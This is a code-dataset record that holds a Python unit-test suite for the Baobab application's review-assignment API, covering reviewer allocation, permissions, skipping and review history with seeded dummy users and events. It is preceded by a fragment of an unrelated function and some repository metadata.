            raise WrongItemError(attribute)
        if not is_attribute(attribute):
            raise WrongAttributeError(attribute)

    # Only the located item matters here; the form is ignored.
    output_item, _ = where_is_attribute(molecular_system, attribute,
                                        check=False)

    return output_item is not None
518
0
23
4aeef765926424bacb89047c3511142f5d667655
53,295
py
Python
api/app/reviews/tests.py
bamtak/Baobab
5489e97a536a3a1c1e994c333a1c471385116cf6
[ "Apache-2.0" ]
null
null
null
api/app/reviews/tests.py
bamtak/Baobab
5489e97a536a3a1c1e994c333a1c471385116cf6
[ "Apache-2.0" ]
null
null
null
api/app/reviews/tests.py
bamtak/Baobab
5489e97a536a3a1c1e994c333a1c471385116cf6
[ "Apache-2.0" ]
null
null
null
from datetime import datetime import json from app import db, LOGGER from app.utils.testing import ApiTestCase from app.events.models import Event, EventRole from app.users.models import AppUser, UserCategory, Country from app.applicationModel.models import ApplicationForm, Question, Section from app.responses.models import Response, Answer, ResponseReviewer from app.reviews.models import ReviewForm, ReviewQuestion, ReviewResponse, ReviewScore from app.utils.errors import REVIEW_RESPONSE_NOT_FOUND, FORBIDDEN, USER_NOT_FOUND from nose.plugins.skip import SkipTest from app.organisation.models import Organisation
42.910628
185
0.618013
from datetime import datetime import json from app import db, LOGGER from app.utils.testing import ApiTestCase from app.events.models import Event, EventRole from app.users.models import AppUser, UserCategory, Country from app.applicationModel.models import ApplicationForm, Question, Section from app.responses.models import Response, Answer, ResponseReviewer from app.reviews.models import ReviewForm, ReviewQuestion, ReviewResponse, ReviewScore from app.utils.errors import REVIEW_RESPONSE_NOT_FOUND, FORBIDDEN, USER_NOT_FOUND from nose.plugins.skip import SkipTest from app.organisation.models import Organisation class ReviewsApiTest(ApiTestCase): def seed_static_data(self): self.add_organisation('Deep Learning Indaba 2019', 'blah.png', 'blah_big.png') self.add_organisation('Deep Learning Indaba 2020', 'blah.png', 'blah_big.png') user_categories = [ UserCategory('Honours'), UserCategory('Student'), UserCategory('MSc'), UserCategory('PhD') ] db.session.add_all(user_categories) db.session.commit() countries = [ Country('Egypt'), Country('Botswana'), Country('Namibia'), Country('Zimbabwe'), Country('Mozambique'), Country('Ghana'), Country('Nigeria') ] db.session.add_all(countries) db.session.commit() reviewer1 = self.add_user('r1@r.com', 'reviewer', '1', 'Mr', 1, 1, 'M', 'Wits', 'CS', 'NA', 2) reviewer2 = self.add_user('r2@r.com', 'reviewer', '2', 'Ms', 1, 1, 'F', 'UCT', 'Chem', 'NA', 2) reviewer3 = self.add_user('r3@r.com', 'reviewer', '3', 'Mr', 1, 1, 'M', 'UKZN', 'Phys', 'NA', 2) reviewer4 = self.add_user('r4@r.com', 'reviewer', '4', 'Ms', 1, 1, 'F', 'RU', 'Math', 'NA', 2) candidate1 = self.add_user('c1@c.com', 'candidate', '1', 'Mr', 1, 2, 'M', 'UWC', 'CS', 'NA', 2) candidate2 = self.add_user('c2@c.com', 'candidate', '2', 'Ms', 3, 4, 'F', 'RU', 'Chem', 'NA', 3) candidate3 = self.add_user('c3@c.com', 'candidate', '3', 'Mr', 5, 6, 'M', 'UFH', 'Phys', 'NA', 4) candidate4 = self.add_user('c4@c.com', 'candidate', '4', 'Ms', 7, 8, 'F', 'NWU', 'Math', 'NA', 5) system_admin 
= self.add_user('sa@sa.com', 'system_admin', '1', 'Ms', 7, 8, 'F', 'NWU', 'Math', 'NA', 5, is_admin=True) event_admin = self.add_user('ea@ea.com', 'event_admin', '1', 'Ms', 7, 8, 'F', 'NWU', 'Math', 'NA', 5) db.session.commit() events = [ Event('indaba 2019', 'The Deep Learning Indaba 2019, Kenyatta University, Nairobi, Kenya ', datetime(2019, 8, 25), datetime(2019, 8, 31), 'KENYADABA2019', 1, 'abx@indaba.deeplearning','indaba.deeplearning'), Event('indaba 2020', 'The Deep Learning Indaba 2018, Stellenbosch University, South Africa', datetime(2018, 9, 9), datetime(2018, 9, 15), 'INDABA2020', 2, 'abx@indaba.deeplearning','indaba.deeplearning') ] db.session.add_all(events) db.session.commit() event_roles = [ EventRole('admin', 10, 1), EventRole('reviewer', 3, 1) ] db.session.add_all(event_roles) db.session.commit() application_forms = [ ApplicationForm(1, True, datetime(2019, 4, 30)), ApplicationForm(2, False, datetime(2018, 4, 30)) ] db.session.add_all(application_forms) db.session.commit() sections = [ Section(1, 'Tell Us a Bit About You', '', 1), Section(2, 'Tell Us a Bit About You', '', 1) ] db.session.add_all(sections) db.session.commit() options = [ { "value": "indaba-2017", "label": "Yes, I attended the 2017 Indaba" }, { "value": "indaba-2018", "label": "Yes, I attended the 2018 Indaba" }, { "value": "indaba-2017-2018", "label": "Yes, I attended both Indabas" }, { "value": "none", "label": "No" } ] questions = [ Question(1, 1, 'Why is attending the Deep Learning Indaba 2019 important to you?', 'Enter 50 to 150 words', 1, 'long_text', ''), Question(1, 1, 'How will you share what you have learnt after the Indaba?', 'Enter 50 to 150 words', 2, 'long_text', ''), Question(2, 2, 'Have you worked on a project that uses machine learning?', 'Enter 50 to 150 words', 1, 'long_text', ''), Question(2, 2, 'Would you like to be considered for a travel award?', 'Enter 50 to 150 words', 2, 'long_text', ''), Question(1, 1, 'Did you attend the 2017 or 2018 Indaba', 'Select an 
option...', 3, 'multi-choice', None, None, True, None, options) ] db.session.add_all(questions) db.session.commit() closed_review = ReviewForm(2, datetime(2018, 4, 30)) closed_review.close() review_forms = [ ReviewForm(1, datetime(2019, 4, 30)), closed_review ] db.session.add_all(review_forms) db.session.commit() review_questions = [ ReviewQuestion(1, 1, None, None, 'multi-choice', None, None, True, 1, None, None, 0), ReviewQuestion(1, 2, None, None, 'multi-choice', None, None, True, 2, None, None, 0), ReviewQuestion(2, 3, None, None, 'multi-choice', None, None, True, 1, None, None, 0), ReviewQuestion(2, 4, None, None, 'information', None, None, False, 2, None, None, 0) ] db.session.add_all(review_questions) db.session.commit() def get_auth_header_for(self, email): body = { 'email': email, 'password': 'abc' } response = self.app.post('api/v1/authenticate', data=body) data = json.loads(response.data) header = {'Authorization': data['token']} return header def setup_one_reviewer_one_candidate(self): responses = [ Response(1, 5, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1) # assign reviewer 1 to candidate 1 response ] db.session.add_all(response_reviewers) db.session.commit() def test_one_reviewer_one_candidate(self): self.seed_static_data() self.setup_one_reviewer_one_candidate() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 1) def test_one_reviewer_one_candidate_review_summary(self): self.seed_static_data() self.setup_one_reviewer_one_candidate() header = self.get_auth_header_for('ea@ea.com') params = {'event_id': 1} response = self.app.get('/api/v1/reviewassignment/summary', headers=header, 
data=params) data = json.loads(response.data) self.assertEqual(data['reviews_unallocated'], 2) def setup_responses_and_no_reviewers(self): responses = [ Response(1, 5, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.') ] db.session.add_all(answers) db.session.commit() def test_no_response_reviewers(self): self.seed_static_data() self.setup_responses_and_no_reviewers() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 0) def test_no_response_reviewers_reviews_unallocated(self): self.seed_static_data() self.setup_responses_and_no_reviewers() header = self.get_auth_header_for('ea@ea.com') params = {'event_id': 1} response = self.app.get('/api/v1/reviewassignment/summary', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_unallocated'], 3) def setup_one_reviewer_three_candidates(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.'), ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1) ] db.session.add_all(response_reviewers) db.session.commit() def test_one_reviewer_three_candidates(self): self.seed_static_data() self.setup_one_reviewer_three_candidates() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = 
json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 3) def setup_one_reviewer_three_candidates_and_one_completed_review(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1) ] db.session.add_all(response_reviewers) db.session.commit() review_response = ReviewResponse(1, 1, 1) db.session.add(review_response) db.session.commit() def test_one_reviewer_three_candidates_and_one_completed_review(self): self.seed_static_data() self.setup_one_reviewer_three_candidates_and_one_completed_review() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 2) def setup_one_reviewer_three_candidates_with_one_withdrawn_response_and_one_unsubmitted_response(self): withdrawn_response = Response(1, 5, True) withdrawn_response.withdraw_response() responses = [ withdrawn_response, Response(1, 6, False), Response(1, 7, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1) ] 
db.session.add_all(response_reviewers) db.session.commit() def test_one_reviewer_three_candidates_with_one_withdrawn_response_and_one_unsubmitted_response(self): self.seed_static_data() self.setup_one_reviewer_three_candidates_with_one_withdrawn_response_and_one_unsubmitted_response() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 1) def setup_multiple_reviewers_with_different_subsets_of_candidates_and_reviews_completed(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True), Response(1, 8, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.'), Answer(4, 1, 'I want to exchange ideas with like minded people'), Answer(4, 2, 'I will mentor people interested in ML.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1), ResponseReviewer(2, 2), ResponseReviewer(3, 2), ResponseReviewer(1, 3), ResponseReviewer(2, 3), ResponseReviewer(3, 3), ResponseReviewer(4, 3), ResponseReviewer(1, 4) ] db.session.add_all(response_reviewers) db.session.commit() review_responses = [ ReviewResponse(1, 2, 2), ReviewResponse(1, 3, 1), ReviewResponse(1, 3, 2), ReviewResponse(1, 4, 1) ] db.session.add_all(review_responses) db.session.commit() def test_multiple_reviewers_with_different_subsets_of_candidates_and_reviews_completed(self): self.seed_static_data() self.setup_multiple_reviewers_with_different_subsets_of_candidates_and_reviews_completed() params = {'event_id': 1} header = self.get_auth_header_for('r1@r.com') response1 = 
self.app.get('/api/v1/review', headers=header, data=params) data1 = json.loads(response1.data) header = self.get_auth_header_for('r2@r.com') response2 = self.app.get('/api/v1/review', headers=header, data=params) data2 = json.loads(response2.data) header = self.get_auth_header_for('r3@r.com') response3 = self.app.get('/api/v1/review', headers=header, data=params) data3 = json.loads(response3.data) header = self.get_auth_header_for('r4@r.com') response4 = self.app.get('/api/v1/review', headers=header, data=params) data4 = json.loads(response4.data) self.assertEqual(data1['reviews_remaining_count'], 3) self.assertEqual(data2['reviews_remaining_count'], 1) self.assertEqual(data3['reviews_remaining_count'], 2) self.assertEqual(data4['reviews_remaining_count'], 0) def test_skipping(self): self.seed_static_data() self.setup_one_reviewer_three_candidates() params = {'event_id': 1, 'skip': 1} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['response']['user_id'], 6) self.assertEqual(data['response']['answers'][0]['value'], 'I want to do a PhD.') self.assertEqual(data['user']['affiliation'], 'RU') self.assertEqual(data['user']['department'], 'Chem') self.assertEqual(data['user']['nationality_country'], 'Botswana') self.assertEqual(data['user']['residence_country'], 'Namibia') self.assertEqual(data['user']['user_category'], 'Student') def test_high_skip_defaults_to_last_review(self): self.seed_static_data() self.setup_one_reviewer_three_candidates() params = {'event_id': 1, 'skip': 5} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['response']['user_id'], 7) self.assertEqual(data['response']['answers'][1]['value'], 'I will share by tutoring.') self.assertEqual(data['user']['affiliation'], 'UFH') 
self.assertEqual(data['user']['department'], 'Phys') self.assertEqual(data['user']['nationality_country'], 'Zimbabwe') self.assertEqual(data['user']['residence_country'], 'Mozambique') self.assertEqual(data['user']['user_category'], 'MSc') def setup_candidate_who_has_applied_to_multiple_events(self): responses = [ Response(1, 5, True), Response(2, 5, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 3, 'Yes I worked on a vision task.'), Answer(2, 4, 'Yes I want the travel award.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1) ] db.session.add_all(response_reviewers) db.session.commit() def test_filtering_on_event_when_candidate_has_applied_to_more_than(self): self.seed_static_data() self.setup_candidate_who_has_applied_to_multiple_events() params = {'event_id': 2} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 1) self.assertEqual(data['response']['user_id'], 5) self.assertEqual(data['response']['answers'][0]['value'], 'Yes I worked on a vision task.') self.assertEqual(data['user']['affiliation'], 'UWC') self.assertEqual(data['user']['department'], 'CS') self.assertEqual(data['user']['nationality_country'], 'South Africa') self.assertEqual(data['user']['residence_country'], 'Egypt') self.assertEqual(data['user']['user_category'], 'Honours') def setup_multi_choice_answer(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() answer = Answer(1, 5, 'indaba-2017') db.session.add(answer) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() def test_multi_choice_answers_use_label_instead_of_value(self): self.seed_static_data() 
self.setup_multi_choice_answer() params = {'event_id': 1} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['response']['answers'][0]['value'], 'Yes, I attended the 2017 Indaba') def test_review_response_not_found(self): self.seed_static_data() params = {'id': 55} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewresponse', headers=header, data=params) data = json.loads(response.data) self.assertEqual(response.status_code, REVIEW_RESPONSE_NOT_FOUND[1]) def setup_review_response(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() answer = Answer(1, 1, 'To learn alot') db.session.add(answer) db.session.commit() self.review_response = ReviewResponse(1, 1, 1) self.review_response.review_scores.append(ReviewScore(1, 'answer1')) self.review_response.review_scores.append(ReviewScore(2, 'answer2')) db.session.add(self.review_response) db.session.commit() db.session.flush() def test_review_response(self): self.seed_static_data() self.setup_review_response() params = {'id': self.review_response.id} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewresponse', headers=header, data=params) data = json.loads(response.data) print(data) self.assertEqual(data['review_form']['id'], 1) self.assertEqual(data['review_response']['reviewer_user_id'], 1) self.assertEqual(data['review_response']['response_id'], 1) self.assertEqual(data['review_response']['scores'][0]['value'], 'answer1') self.assertEqual(data['review_response']['scores'][1]['value'], 'answer2') def test_prevent_saving_review_response_reviewer_was_not_assigned_to_response(self): self.seed_static_data() params = json.dumps({'review_form_id': 1, 'response_id': 1, 'scores': [{'review_question_id': 1, 'value': 'test_answer'}]}) header = self.get_auth_header_for('r1@r.com') response = 
self.app.post('/api/v1/reviewresponse', headers=header, data=params, content_type='application/json') self.assertEqual(response.status_code, FORBIDDEN[1]) def setup_response_reviewer(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() def test_saving_review_response(self): self.seed_static_data() self.setup_response_reviewer() params = json.dumps({'review_form_id': 1, 'response_id': 1, 'scores': [{'review_question_id': 1, 'value': 'test_answer'}]}) header = self.get_auth_header_for('r1@r.com') response = self.app.post('/api/v1/reviewresponse', headers=header, data=params, content_type='application/json') review_scores = db.session.query(ReviewScore).filter_by(review_response_id=1).all() self.assertEqual(response.status_code, 201) self.assertEqual(len(review_scores), 1) self.assertEqual(review_scores[0].value, 'test_answer') def setup_existing_review_response(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() review_response = ReviewResponse(1, 1, 1) review_response.review_scores = [ReviewScore(1, 'test_answer1'), ReviewScore(2, 'test_answer2')] db.session.add(review_response) db.session.commit() def test_updating_review_response(self): self.seed_static_data() self.setup_existing_review_response() params = json.dumps({'review_form_id': 1, 'response_id': 1, 'scores': [{'review_question_id': 1, 'value': 'test_answer3'}, {'review_question_id': 2, 'value': 'test_answer4'}]}) header = self.get_auth_header_for('r1@r.com') response = self.app.put('/api/v1/reviewresponse', headers=header, data=params, content_type='application/json') review_scores = db.session.query(ReviewScore).filter_by(review_response_id=1).order_by(ReviewScore.review_question_id).all() self.assertEqual(response.status_code, 200) 
self.assertEqual(len(review_scores), 2) self.assertEqual(review_scores[0].value, 'test_answer3') self.assertEqual(review_scores[1].value, 'test_answer4') def test_user_cant_assign_responsesreviewer_without_system_or_event_admin_role(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'r2@r.com', 'num_reviews': 10} header = self.get_auth_header_for('c1@c.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) self.assertEqual(response.status_code, FORBIDDEN[1]) def test_reviewer_not_found(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'non_existent@user.com', 'num_reviews': 10} header = self.get_auth_header_for('sa@sa.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) self.assertEqual(response.status_code, USER_NOT_FOUND[1]) def test_add_reviewer_with_no_roles(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'r1@r.com', 'num_reviews': 10} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) event_roles = db.session.query(EventRole).filter_by(user_id=1, event_id=1).all() self.assertEqual(len(event_roles), 1) self.assertEqual(event_roles[0].role, 'reviewer') def test_add_reviewer_with_a_role(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'ea@ea.com', 'num_reviews': 10} header = self.get_auth_header_for('sa@sa.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) event_roles = db.session.query(EventRole).filter_by(user_id=10, event_id=1).order_by(EventRole.id).all() self.assertEqual(len(event_roles), 2) self.assertEqual(event_roles[0].role, 'admin') self.assertEqual(event_roles[1].role, 'reviewer') def setup_responses_without_reviewers(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True), Response(1, 8, True) ] db.session.add_all(responses) 
db.session.commit() def test_adding_first_reviewer(self): self.seed_static_data() self.setup_responses_without_reviewers() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 4} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(response.status_code, 201) self.assertEqual(len(response_reviewers), 4) def test_limit_of_num_reviews(self): self.seed_static_data() self.setup_responses_without_reviewers() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 3) def setup_reviewer_with_own_response(self): responses = [ Response(1, 3, True), # reviewer Response(1, 5, True) # someone else ] db.session.add_all(responses) db.session.commit() def test_reviewer_does_not_get_assigned_to_own_response(self): self.seed_static_data() self.setup_reviewer_with_own_response() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 1) self.assertEqual(response_reviewers[0].response_id, 2) def setup_withdrawn_and_unsubmitted_responses(self): responses = [ Response(1, 5, is_submitted=False, is_withdrawn=False), Response(1, 6, is_submitted=True, is_withdrawn=True), Response(1, 7, is_submitted=True, is_withdrawn=False) ] db.session.add_all(responses) db.session.commit() def 
test_withdrawn_and_unsubmitted_responses_are_not_assigned_reviewers(self): self.seed_static_data() self.setup_withdrawn_and_unsubmitted_responses() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 1) self.assertEqual(response_reviewers[0].response_id, 3) def setup_response_with_three_reviewers(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(1, 2), ResponseReviewer(1, 4) ] db.session.add_all(response_reviewers) db.session.commit() def test_response_with_three_reviewers_does_not_get_assigned_another_reviewer(self): self.seed_static_data() self.setup_response_with_three_reviewers() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 0) def setup_responsereview_with_different_reviewer(self): response = Response(1, 5, is_submitted=True) db.session.add(response) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() def test_response_will_get_multiple_reviewers_assigned(self): self.seed_static_data() self.setup_responsereview_with_different_reviewer() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = 
db.session.query(ResponseReviewer).order_by(ResponseReviewer.reviewer_user_id).all() self.assertEqual(len(response_reviewers), 2) self.assertEqual(response_reviewers[0].reviewer_user_id, 1) self.assertEqual(response_reviewers[1].reviewer_user_id, 3) def setup_reviewer_is_not_assigned_to_response_more_than_once(self): response = Response(1,5,is_submitted=True) db.session.add(response) db.session.commit() def setup_count_reviews_allocated_and_completed(self): db.session.add_all([ EventRole('reviewer', 1, 1), EventRole('reviewer', 2, 1), EventRole('reviewer', 3, 1), EventRole('reviewer', 4, 1) ]) responses = [ Response(1, 5, True), #1 Response(1, 6, True), #2 Response(1, 7, True), #3 Response(1, 8, True), #4 Response(2, 5, True), #5 Response(2, 6, True) #6 ] db.session.add_all(responses) response_reviewers = [ ResponseReviewer(1, 2), ResponseReviewer(2, 2), ResponseReviewer(3, 2), ResponseReviewer(4, 2), ResponseReviewer(6, 2), ResponseReviewer(2, 3), ResponseReviewer(4, 3), ResponseReviewer(3, 4), ResponseReviewer(5, 1), ] db.session.add_all(response_reviewers) # review form, review_user_id, response_id review_responses = [ ReviewResponse(1, 3, 2), ReviewResponse(1, 3, 4), ReviewResponse(1, 2, 1), ReviewResponse(1, 2, 3), ReviewResponse(1, 2, 4), ReviewResponse(2, 1, 5), ReviewResponse(2, 2, 6) ] db.session.add_all(review_responses) db.session.commit() # response 1 - 1 review assigned - 1 complete # response 2 - 2 reviews - 1 complete # response 3 - 2 reviews - 1 complete # response 4 - 2 reviews - 1 complete # response 5 - 1 review - 1 complete # response 6 - 1 review - 1 complete # reviewer 1 - 1 review assigned (1 from event 2) - 1 complete # reviewer 2 - 5 reviews assigned (1 from event 2)- 3 complete # reviewer 3 - 2 reviews assigned - 2 complete # reviewer 4 - 1 review assigned - none complete # total assigned reviews: 9 # total required review = 6*3 = 18 # total unallocated: 18 - 9 = 9 # total completed reviews: 6 @SkipTest def 
test_count_reviews_allocated_and_completed(self): self.seed_static_data() self.setup_count_reviews_allocated_and_completed() header = self.get_auth_header_for('ea@ea.com') params = {'event_id': 1} response = self.app.get('/api/v1/reviewassignment', headers=header, data=params) data = json.loads(response.data) data = sorted(data, key=lambda k: k['email']) LOGGER.debug(data) self.assertEqual(len(data),3) self.assertEqual(data[0]['email'], 'r2@r.com') self.assertEqual(data[0]['reviews_allocated'], 4) self.assertEqual(data[0]['reviews_completed'], 3) self.assertEqual(data[1]['email'], 'r3@r.com') self.assertEqual(data[1]['reviews_allocated'], 2) self.assertEqual(data[1]['reviews_completed'], 2) self.assertEqual(data[2]['email'], 'r4@r.com') self.assertEqual(data[2]['reviews_allocated'], 1) self.assertEqual(data[2]['reviews_completed'], 0) def test_reviewer_is_not_assigned_to_response_more_than_once(self): self.seed_static_data() self.setup_reviewer_is_not_assigned_to_response_more_than_once() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response2 = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).all() self.assertEqual(len(response_reviewers), 1) def setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores(self): second_reviewer = EventRole('reviewer', 2, 1) db.session.add(second_reviewer) db.session.commit() responses = [ Response(1, 5, is_submitted=True), Response(1, 6, is_submitted=True), Response(1, 7, is_submitted=True) ] db.session.add_all(responses) db.session.commit() final_verdict_options = [ {'label': 'Yes', 'value': 2}, {'label': 'No', 'value': 0}, {'label': 'Maybe', 'value': 1}, ] verdict_question = ReviewQuestion(1, None, None, 'Final Verdict', 'multi-choice', None, final_verdict_options, True, 3, 
None, None, 0) db.session.add(verdict_question) db.session.commit() review_responses = [ ReviewResponse(1,3,1), ReviewResponse(1,3,2), ReviewResponse(1,2,1), ReviewResponse(1,2,2), ReviewResponse(1,3,3) ] review_responses[0].review_scores = [ReviewScore(1, '23'), ReviewScore(5, '1')] review_responses[1].review_scores = [ReviewScore(1, '55'), ReviewScore(5, '2')] review_responses[2].review_scores = [ReviewScore(1, '45'), ReviewScore(2, '67'), ReviewScore(5, 'No')] review_responses[3].review_scores = [ReviewScore(1, '220'), ReviewScore(5, '2')] review_responses[4].review_scores = [ReviewScore(1, '221'), ReviewScore(5, '1')] db.session.add_all(review_responses) db.session.commit() def test_review_history_returned(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 3) self.assertEqual(data['num_entries'], 3) self.assertEqual(data['reviews'][0]['review_response_id'], 1) self.assertEqual(data['reviews'][0]['nationality_country'], 'South Africa') self.assertEqual(data['reviews'][0]['residence_country'], 'Egypt') self.assertEqual(data['reviews'][0]['affiliation'], 'UWC') self.assertEqual(data['reviews'][0]['department'], 'CS') self.assertEqual(data['reviews'][0]['user_category'], 'Honours') self.assertEqual(data['reviews'][0]['final_verdict'], 'Maybe') self.assertEqual(data['reviews'][1]['review_response_id'], 2) self.assertEqual(data['reviews'][1]['nationality_country'], 'Botswana') self.assertEqual(data['reviews'][1]['residence_country'], 'Namibia') self.assertEqual(data['reviews'][1]['affiliation'], 'RU') self.assertEqual(data['reviews'][1]['department'], 'Chem') self.assertEqual(data['reviews'][1]['user_category'], 
